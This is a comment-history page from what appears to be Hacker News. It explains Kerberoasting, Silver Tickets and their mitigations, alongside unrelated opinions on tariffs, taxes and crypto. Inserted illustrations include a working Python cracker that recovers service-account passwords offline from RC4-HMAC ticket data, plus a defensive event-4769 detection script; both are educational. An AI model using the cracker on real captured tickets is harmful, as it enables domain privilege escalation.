harmon's comments

harmon | 6 months ago | on: Kerberoasting

Fine, Kerberoasting abuses TGS-REPs which are colloquially referred to as TGS tickets or TGSs*. You know what I meant.

harmon | 6 months ago | on: Kerberoasting

> It's wild to me that this could happen just from solving the puzzle that allows the user's account to use the user's privileges (only) on the service... ?

Yes, it is an unfortunate design decision in the Microsoft implementation of the Kerberos protocol.

To interact with Active Directory and perform privileged actions, a service needs an Active Directory account that it can leverage for authenticated actions. This is colloquially referred to as a "service account", but it is not a special account type, it is just a regular Active Directory user or computer account designated for exclusive use by a service. Sometimes administrators will save time by registering a service under their own Domain Admin user account instead of creating a designated account for a service. This effectively makes their user account the service account. In other cases, extensive privileges may be required by a service (e.g. for network access control services, asset discovery services, vulnerability scanners, etc.) and administrators find it easier to just create a Domain Admin (high privilege) account for that service than to do fine-grained permissioning. This creates a dangerous situation where if an attacker can kerberoast the account associated with the service, they can immediately take possession of a high privilege account that can be used anywhere within the Active Directory environment.

> Since it's cryptographic signing, wouldn't this require reversing the hash?

Yes, you would need to brute-force it.

> Does any valid inverse of the hash work, or only the actual password that happened to get hashed?

Theoretically yes, any valid inverse of the hash would work, but to my knowledge there aren't any hash collisions for the NT hash algorithm. Practically speaking, this means that only the user's password would yield the correct hash.
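A worked illustration of the brute force described in this thread, added here as an example (it is not code from the original comments or from any tool they mention). It builds the RC4-HMAC (RFC 4757) enc-part of a ticket under the NT hash of a constructed weak password, then runs a constructed wordlist against it the way an offline cracker does: each candidate password is turned into an NT hash (MD4 over the UTF-16LE password), the candidate key is used to decrypt the body, and the recovered plaintext is checked against the HMAC-MD5 checksum that travels with the ciphertext. Only the key derived from the real password reproduces that checksum, which is why the guess can be verified without ever contacting the domain controller. The password, the plaintext stand-in for the EncTicketPart, and the wordlist are all made up for the example; the MD4 routine is included in pure Python because OpenSSL 3 builds of `hashlib` frequently lack the legacy `md4` digest.

```python
import hashlib
import hmac
import os
import struct


# Pure-Python MD4 (RFC 1320), used only because hashlib.new("md4") is often
# unavailable on OpenSSL 3 builds. NT hash = MD4(UTF-16LE(password)).
def _md4(data: bytes) -> bytes:
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    rounds = [
        (F, 0x00000000, [3, 7, 11, 19], list(range(16))),
        (G, 0x5A827999, [3, 5, 9, 13], [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, [3, 9, 11, 15], [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for j, i in enumerate(order):
                t = (a + fn(b, c, d) + X[i] + k) & 0xFFFFFFFF
                a, b, c, d = d, rotl(t, shifts[j % 4]), b, c
        state = [(s + v) & 0xFFFFFFFF for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key for an account is its NT hash."""
    return _md4(password.encode("utf-16-le"))


def _rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# RFC 4120 key usage 2: the ticket enc-part, encrypted under the service key.
_TICKET_USAGE = struct.pack("<I", 2)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes) -> bytes:
    """RFC 4757 encryption: output is checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac.new(key, _TICKET_USAGE, hashlib.md5).digest()
    data = os.urandom(8) + plaintext  # 8-byte random confounder
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + _rc4(k3, data)


def rc4_hmac_check(key: bytes, enc_part: bytes) -> bool:
    """Decrypt with a candidate key and verify the checksum; True only for the real key."""
    checksum, body = enc_part[:16], enc_part[16:]
    k1 = hmac.new(key, _TICKET_USAGE, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    data = _rc4(k3, body)
    return hmac.compare_digest(hmac.new(k1, data, hashlib.md5).digest(), checksum)


def kerberoast_crack(enc_part: bytes, wordlist):
    """Offline guess-and-verify over a wordlist; returns the password or None."""
    for candidate in wordlist:
        if rc4_hmac_check(nt_hash(candidate), enc_part):
            return candidate
    return None


# Constructed demo data (not a real ticket): a weak service-account password and a
# stand-in for the plaintext EncTicketPart that a real TGS would carry.
WEAK_PASSWORD = "Summer2019!"
SAMPLE_ENC_PART = rc4_hmac_encrypt(
    nt_hash(WEAK_PASSWORD), b"constructed EncTicketPart for svc_sql/sql01.corp.local"
)
WORDLIST = ["password", "Welcome1", "Summer2019!", "P@ssw0rd"]

if __name__ == "__main__":
    print("recovered:", kerberoast_crack(SAMPLE_ENC_PART, WORDLIST))
```

The same guess-and-verify loop is what a GPU cracker runs against a captured TGS-REP, so the cost of the attack is set entirely by the password's guessability; AES-encrypted tickets change the key derivation (PBKDF2 with many iterations) but not the principle.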

harmon | 6 months ago | on: Kerberoasting

If you have the user's credentials then you can indeed connect to the service as you normally would. The advantages of performing this attack are:

1. You can obtain the service account's password, and the service account may be provisioned with more privileges than the user's account that you compromised. This allows for privilege escalation beyond simply accessing the service. For example, perhaps the service account has administrative access on other machines, or it is used for multiple services, or it is a Domain Admin in which case you can completely compromise the domain.

2. TGS tickets used to request access to a service are cryptographically signed with the password hash of the service account. Services use this to confirm ticket validity. In most cases, this means that if you can derive the service account password, you can forge TGS tickets that claim to be associated with arbitrary domain users. Instead of accessing the service as a low privilege user, you can now access the service as an Enterprise Admin or another high privilege account which could enable access to more resources or administrative access to the machine. This is called a Silver Ticket attack.

harmon | 6 months ago | on: Kerberoasting

Managed and group managed service account passwords are typically 240 characters long and rotate every 30 days. It is highly unlikely that an attacker can crack these.

harmon | 6 months ago | on: Kerberoasting

This article is somewhat incorrect. Kerberoasting abuses Ticket Granting Service tickets (TGSs, which are used to request access to a registered service in Active Directory), not Ticket Granting Tickets (TGTs, which are used to prove identity to a Domain Controller and request TGSs). However, the general attack described is still correct.

TGSs are (AES or RC4) encrypted with the NT password hash of the service account they are associated with. If you have a weak service account password, then TGSs can be cracked to obtain the service account's password. A lot of times admins will create service accounts that have way more permissions than required (e.g. they make them a DA) which can lead to an immediate privilege escalation. Sometimes they also use regular user accounts for service registration instead of designated service accounts, and user accounts tend to have weaker passwords. To make it worse, any low privilege Active Directory account can request a TGS for any service, even if they are not allowed to access that service.

Even if the service account is lower privilege, this can enable a silver ticket attack. https://www.crowdstrike.com/en-us/cybersecurity-101/cyberatt...

There are multiple mitigations for this:

1. Use managed or group managed service accounts instead of manually managed ones where possible. This ensures that account passwords are long, strong, and rotated regularly. If you are going to provision service accounts manually, give them very strong passwords.

2. Apply the principle of least privilege and only assign service accounts the privileges they need. Avoid placing them in high privilege groups.

3. Disable RC4 in your environment if possible via Group Policy.

4. Monitor for RC4 ticket requests. AES-encrypted tickets are the default these days. https://adsecurity.org/?p=3458

5. Create a honeypot service account: https://adsecurity.org/?p=3513

There is a somewhat similar attack against TGTs called ASREPRoasting: https://book.hacktricks.wiki/en/windows-hardening/active-dir...
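Mitigations 4 and 5 above (watch for RC4 ticket requests; plant a honeypot service account) boil down to rules over Security event 4769, "A Kerberos service ticket was requested". The following is an added example, not code from the original comment or from the linked adsecurity.org posts, of those rules run over constructed sample events flattened to key=value lines the way a log forwarder might emit them. It flags successful 4769s for user service accounts where the ticket encryption type is 0x17 (RC4-HMAC), skips krbtgt and computer accounts (which end in `$`) because those are not roastable targets, raises a separate alert for any request naming the honeypot account, and finally counts distinct SPNs per requester so that a burst of requests (AES or not) from one user stands out. The honeypot account name, the burst threshold, and every event line are assumptions made for the example.

```python
import re
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample events (not real logs). Fields mirror the names Windows uses
# in event 4769; values are made up. AES256-CTS-HMAC-SHA1-96 is 0x12.
SAMPLE_4769 = [
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.42",
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.42",
    "EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.42",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.7",
    "EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 Status=0x0 IpAddress=::ffff:10.0.0.7",
    "EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=WS01$ TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.9",
    "EventID=4769 TargetUserName=mallory@CORP.LOCAL ServiceName=svc_backup_legacy TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.66",
    "EventID=4769 TargetUserName=eve@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 Status=0x12 IpAddress=::ffff:10.0.0.80",
    "EventID=4768 TargetUserName=alice@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0 IpAddress=::ffff:10.0.0.42",
]

# Assumed honeypot account: an SPN-bearing account nothing legitimate ever asks for.
HONEYPOT_ACCOUNTS = {"svc_backup_legacy"}


def parse_event(line: str) -> dict:
    """key=value pairs separated by whitespace -> dict (values have no spaces here)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def roast_indicators(events, honeypots, burst_threshold: int = 3):
    """Return (rule, requester, detail) tuples for Kerberoasting indicators."""
    alerts = []
    spns_per_requester = defaultdict(set)
    for ev in map(parse_event, events):
        # Only successful service-ticket requests are interesting here.
        if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
            continue
        service, requester = ev["ServiceName"], ev["TargetUserName"]
        # Rule: any request for the honeypot is an alert regardless of etype.
        if service.lower() in {h.lower() for h in honeypots}:
            alerts.append(("honeypot", requester, service))
            continue
        # TGT renewals (krbtgt) and computer accounts are not roastable targets.
        if service == "krbtgt" or service.endswith("$"):
            continue
        # Rule: RC4 ticket for a user service account in an AES-default environment.
        if ev.get("TicketEncryptionType") == RC4_HMAC:
            alerts.append(("rc4_tgs", requester, service))
        spns_per_requester[requester].add(service)
    # Rule: one requester pulling tickets for many distinct SPNs.
    for requester, spns in spns_per_requester.items():
        if len(spns) >= burst_threshold:
            alerts.append(("many_spns", requester, len(spns)))
    return alerts


if __name__ == "__main__":
    for alert in roast_indicators(SAMPLE_4769, HONEYPOT_ACCOUNTS):
        print(alert)
```

In a real environment the RC4 rule needs a baseline first: legacy applications and trusts that still negotiate RC4 will show up as 0x17 and should be allow-listed or, better, fixed, since every one of them is a reason an attacker can keep asking for RC4 tickets.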

harmon | 10 months ago | on: Amazon denies tariff pricing plan after White House calls it "hostile/political"

As these tariffs are objectively likely to drive up costs, hurt user demand, and lower revenue for the company, I would argue that they have a duty to their shareholders and other stakeholders to push back against them and not be neutral. It is an action driven by business concerns rather than politics.

Also yes, taxes are listed as a separate line item.

harmon | 1 year ago | on: After 12 years of reviewing restaurants, I'm leaving the table

As I understand it, you can only write off a business's expenses against that business's income, not income from other sources. For example, if you have a W2 income source and you have this business generating losses, you can't take your business losses or write offs and apply them to your W2 income, so you wouldn't really be saving any money as there would be no revenue to write off expenses against. You would need to get the business to generate revenue for this to be a viable idea.

The only case that I am aware of where you can take business losses / write offs and apply them to other income sources is in real estate, and only under very specific circumstances. This is one reason why high income individuals love things like short term rentals which is one circumstance in which this is possible.

harmon | 2 years ago | on: California employers must reimburse remote workers for all necessary expenses

I agree, honestly I feel a much better solution to this problem would be to extend the same tax advantages that you allude to when talking about a personal company to W2 employees.

Provision a home office? All of those expenses should be tax deductible.

BYOD? You should be able to expense a portion of the costs.

Pay for internet and power? You should be able to deduct a percentage of costs.

Have a work related meal? Tax deductible.

Drive your car to work? You should be able to deduct your mileage or depreciate your vehicle.

Pay for public transit passes to get to work? Tax deductible.

Etc, etc

harmon | 3 years ago | on: SBF Caught Using VPN While Awaiting Criminal Trial [pdf]

Mass surveillance is out of control as you say, and I am a strong proponent of reining in warrantless wiretaps and governmental overreach. However, as many people have stated, a pen register (which requires a warrant) against a specific individual suspected of a crime where there is a MASSIVE amount of evidence suggesting that the suspect is guilty has nothing to do with mass surveillance. This is targeted, narrowly scoped surveillance of a specific suspect and is precisely what law enforcement should be doing.

harmon | 3 years ago | on: Ask HN: Feeling Hopeless and Lost at 23

So I used to be in a very similar boat as you: I was depressed while working towards a STEM degree in college and ended up almost failing out with a 2.X GPA. I didn't see a path forward, and there was only one entity that was willing to hire me to do "real" work (for basically minimum wage). Like you, I thought I was totally fucked. Turns out, I wasn't. I spent the next 7 years working incredibly hard at that job. I taught myself software development skills in a similar manner as you out of personal interest. Eventually I was skilled enough to make major contributions at work and transitioned into a developer role. I continued studying and also took some remedial courses at a local university to prove that I could get A's if I tried. I then applied to a Master's program with glowing recommendations from my employer, a proven professional track record of success, and the transcripts from the local university. I was sure the admissions people would laugh and toss my application right into the trash. Guess what? I got into a great program! I'm now working in my dream role at a tech company, I got the opportunity to go back and prove to myself that I could succeed academically, and I learned a lot while in the program. You are already at a prestigious company as a full stack dev, so your road could be A LOT shorter than mine. I will give you the following advice based on my experience:

1. Realistically you are doing well. You are already in a great role; it sounds like you may just be struggling a bit. You mentioned feeling overwhelmed: have you reached out to your manager or a more senior engineer on your team for help? I bet they would be able to identify any weak points that you have which you could fix with self-directed learning (which it sounds like you are experienced at). Has anyone made a comment on your performance? If not, is it possible that some of your feelings are driven by imposter syndrome? The fact that you were hired despite your academic record suggests that you are certainly a competent dev.

2. No one likes hearing this, but you need to be patient. You only recently began your professional career (whereas I am in my mid 30s), and it will take time to build up the reputation and the track record to offset your past. By "time" I mean probably a few years minimum. Don't be deterred by this though, as these few years will be periods of heavy growth. I should also note that when I say it will take time to offset past performance, I am speaking purely from an academic perspective. From a professional perspective, you left your academic record behind when you got your first job, so I wouldn't spend time dwelling on it.

3. I agree that getting a Master's degree may be helpful, if for no other reason than it sounds like you may have a chip on your shoulder about your academic record. If you are serious about going back to school, take the following actions:

* Work. Fucking. Hard. Build a track record of success in your role.

* Get a portfolio of projects together that you can show off.

* Continue your self-directed learning and fill in gaps in understanding yourself. Work with your manager / seniors to identify these.

* Succeed in some sort of graded endeavor that you can use to display that you are serious and diligent: take courses somewhere and get A's; take coursework on Coursera or something else and get a certificate; get an industry certification or two; do research and put out a paper; etc. Basically you want to show the program that you can succeed academically and that you won't flake out if they admit you.

If you want to chat about your situation further, I'm happy to do so out of band.

harmon | 3 years ago | on: The ‘E-Pimps’ of OnlyFans

Ultimately if users are satisfied and happy, does it even matter if it is fake? The end goal is not to create a real relationship, it is to create a happy fantasy for the buyer.

harmon | 3 years ago | on: Is the Ride over for Uber?

> The endless pursuit of growth is usually a byproduct of ego or at the behest of some intangible idea of "creating shareholder value."

If you don't want to grow that's fine, but then don't go public and don't seek VC funding. Investors make money when you grow; they generally don't make much when you don't. Ergo, they will always be pushing you to grow.

harmon | 3 years ago | on: Pentagon UFO study led by researcher who believes in the supernatural

The existence of an "active" God as portrayed in most religions would complicate things tremendously though. If an entity can inject energy into the system or can alter system properties at will then the fundamental assumptions about the way the universe works go out the window.

harmon | 3 years ago | on: New California law requires high schools to start later

Even if you only take courses that aren't wastes of time, there just isn't that much to do on a typical day. I remember when I was in school I was taking something like 5 AP courses senior year but still had multiple study halls per day, a useless homeroom which was basically a buffer for people getting to school late, a gym class, and a 40 minute lunch. Almost half the day was time not spent in lecture. A lot of the time is literally babysitting.

This is how people can go to college and spend comparatively little time in class yet learn more than they did in high school.

harmon | 3 years ago | on: Three Arrows Capital has defaulted on a loan worth more than $670M

> Hot take: It’s fine when it happens to extreme hubris with paper wealth. It is not fine when it was someone unsophisticated chasing the herd who lost a meager sum that was meaningful to them. Comedy vs tragedy.

I think this is overlooking why people are engaging in these types of investments to begin with: they're greedy speculators who got caught up in a get rich quick scheme. They don't know what this tech is, why it is or isn't useful, or how it works. They don't know what the investment risks are and don't make any attempt at mitigating risk. They don't seek expert assistance. Instead of doing basic research to make informed decisions, they see dollar signs and yolo with their life savings. I don't feel bad for them in the same way that I don't feel bad for people who fall for 419 scams. If you participate in get rich quick schemes that you don't understand, there is a high probability of getting owned. This exact same collapse in value happened only 5 years ago, how could people be caught flat footed twice?

harmon | 3 years ago | on: Why America can’t build

Exactly this. Every project is going to impact the environment. The end goal of a risk assessment is not to bring the environmental risk to zero, it is to bring it down to an acceptable level given the benefits of the project.

harmon | 3 years ago | on: The Victim Cloud: Gullibility in the golden age of scams

The story in the article was completely preventable if banks just tried harder.

The default 2FA solution should be Google authenticator or an analogous tech. If SMS MUST be used, it should be opt in.

Notification of anomalous transactions should be automatic, not something you have to configure.

Anomalous wire transfers should be flagged and require verbal authentication by phone.

Banks should stop sending so much spam marketing email so that when people receive an email from their bank it is something they actually read.

Etc

harmon | 3 years ago | on: Starbucks may close its bathrooms to the public again

Honestly, I do think we should reopen psychiatric institutions (although properly funded and regulated this time) and forcibly treat certain people that need help. I don't think it is good or acceptable to allow people with obviously severe mental illness to self medicate with unregulated drugs or alcohol and walk around disrupting society. The current state of affairs works for no one, especially the mentally ill who we could be treating but have chosen not to.

As for property crime, no one wants to live in a society where someone can steal your stuff with impunity, as the broadly supported recent recall of the DA in SF has clearly shown.

harmon | 3 years ago | on: Do kwon sent $80M a month to secret wallets?

I'm a crypto user, I'm a former Ethereum miner, I've read white papers, I've paid for things with crypto... and I'm disenchanted with it. Crypto seems to be great for three things: money laundering, tax evasion, and capital flight. Now, I'm not necessarily totally against those things as I think AML is excessive these days, I have a healthy distrust of government, and I value my privacy, but if you're not interested in doing those things then I struggle to see why crypto would be your go-to solution for any problem. Can you name a problem which crypto has actually helped solve other than those? We've had billions of investment dollars and thousands of talented people enter this space and as far as I know basically nothing of real value has emerged as a result. I would love to be proven wrong though.